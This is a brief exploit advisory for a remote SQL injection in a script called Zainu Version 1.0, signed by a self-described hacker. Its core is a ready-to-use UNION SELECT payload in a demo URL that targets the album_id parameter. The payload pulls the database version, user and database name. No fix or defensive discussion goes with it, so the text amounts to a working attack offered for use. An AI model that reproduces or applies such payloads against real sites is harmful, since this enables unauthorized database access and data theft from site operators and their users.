#-------------------------------------------------------- #Zainu - Version 1.0 Remote SQL Injection Vulnerability #-------------------------------------------------------- #Discovered By: Snakespc ALGERIAN HaCkEr #Mail: snakespc@gmail.com #------------------------------------------------------- #Script:Zainu - Version 1.0 #-------------------------------------------------------- #Exploit: #-------- #Demo: #http://www.localhost.com/(script)/index.php?view=AlbumSongs&album_id=-2+UNION all SELECT 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11-- ----------------------------------------------------------